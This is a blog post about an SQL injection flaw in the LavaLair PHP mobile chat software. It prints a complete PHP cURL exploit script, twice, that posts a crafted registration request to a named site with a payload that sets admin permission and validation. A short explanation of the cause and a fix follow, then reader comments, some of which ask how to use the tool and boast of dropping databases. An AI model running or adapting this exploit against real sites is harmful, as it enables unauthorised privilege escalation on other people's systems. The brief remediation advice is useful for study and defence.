LavaLair SQL Injection Vulnerability: Looking Inside

Lavalair is the name of a very popular mobile chat community software developed using PHP MySQL and WML front end. I was once a serious mobile web developer and worked with mobile web apps a lot.

A few days ago, a Indian boy asked for some help with a wapdesire clone of LavaLair. His site was getting hacked by some so-called “hackers”. My experience with LavaLair told me it was some sort of nasty SQL Injection. After having a look at the script, I found out a intensive SQL Injection vulnerability in the registration page. I wrote a CLI php script to inject some SQL codes.

Here is the tool I used to crack into the target site:

<?php
class Browser {
function __construct($ua="") {
$this->UserAgent = $ua;
}
public $curl, $count, $data,$UserAgent;
function url($url) { $this->curl = curl_init($url); }
function fields($count) { $this->count = $count; }
function data($data) { $this->data = strtolower($data); }
function send() {
curl_setopt($this->curl, CURLOPT_POST, $this->count);
if(!empty($this->UserAgent)) {
curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);
 }
curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);
curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($this->curl);
curl_close($this->curl);
return $result;
}

}

$uid = "masnun";

$info = "fear the geek, since you must!',perm='4',validated='1'#";
$m = new Browser("Samsung SGH C160");
$m->url("http://kalponik.freehostia.com/web/register.php");
$m->fields(12);
$m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month=03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

print_r($m->send());

?>

<?php

class Browser {

function __construct($ua="") {

$this->UserAgent = $ua;

}

public $curl, $count, $data,$UserAgent;

function url($url) { $this->curl = curl_init($url); }

function fields($count) { $this->count = $count; }

function data($data) { $this->data = strtolower($data); }

function send() {

curl_setopt($this->curl, CURLOPT_POST, $this->count);

if(!empty($this->UserAgent)) {

curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);

}

curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);

curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);

$result = curl_exec($this->curl);

curl_close($this->curl);

return $result;

}

$uid = "masnun";

$info = "fear the geek, since you must!',perm='4',validated='1'#";

$m = new Browser("Samsung SGH C160");

$m->url("http://kalponik.freehostia.com/web/register.php");

$m->fields(12);

$m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month=03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

print_r($m->send());

The easiest explanation is that LavaLair by default requires magic_quotes_gpc() to be off and it’s insert SQLs are in the format:

insert into table_name set column_1='value_1', column_2 ='value_2'

1	insert into table_name set column_1='value_1', column_2 ='value_2'

So, it becomes easy to inject some single quotes and hash sign to terminate the script and modify it the way you wish.

My suggestion would be to use Insert SQLs in this way:

insert into table_name (column_1,column_2) values ('value_1','value_2')

1	insert into table_name (column_1,column_2) values ('value_1','value_2')

And now a little rant about these so called hackers… I have heard lots of stories about AyOn and some other freaks terrorizing the LL community… It’s really funny the way the developers never bothered to learn how these scrip kiddies or so-called hackers managed their way in… From the very beginning, I have used J21Community with magic_quotes_gpc turned on and secure SQL queries. That’s one of the important reasons why no J21Community site has been hacked yet by SQL Injection… 😀

19 replies on “LavaLair SQL Injection Vulnerability: Looking Inside”

Its not working at premium hosting.

Unbeleavable!

[…] LavaLair SQL Injection Vulnerability: Looking Inside | maSnun.com […]

hmmm try korchi.only kalponik ei parchi

Just chnage the database structure name and use capctha code.

salam masnun bhai i used ur tools which u posted here but its not working its show registeration successfully but dat code not make owner by changing perm also thnx help again how to inject sql in lavalair scripts or wapdesire allah hafiz

how did u do the sql injection how do you use that tool u provided

xml attack good for lavalair script…i can drop ur site data base within 2 min …. 🙂

Nice story … And Ayon’s lavalair script got hacked By Prohor . ..People often think they are great hackers/crackers !People should be hacked sometimes by someone .. after all failure is the pillar of success !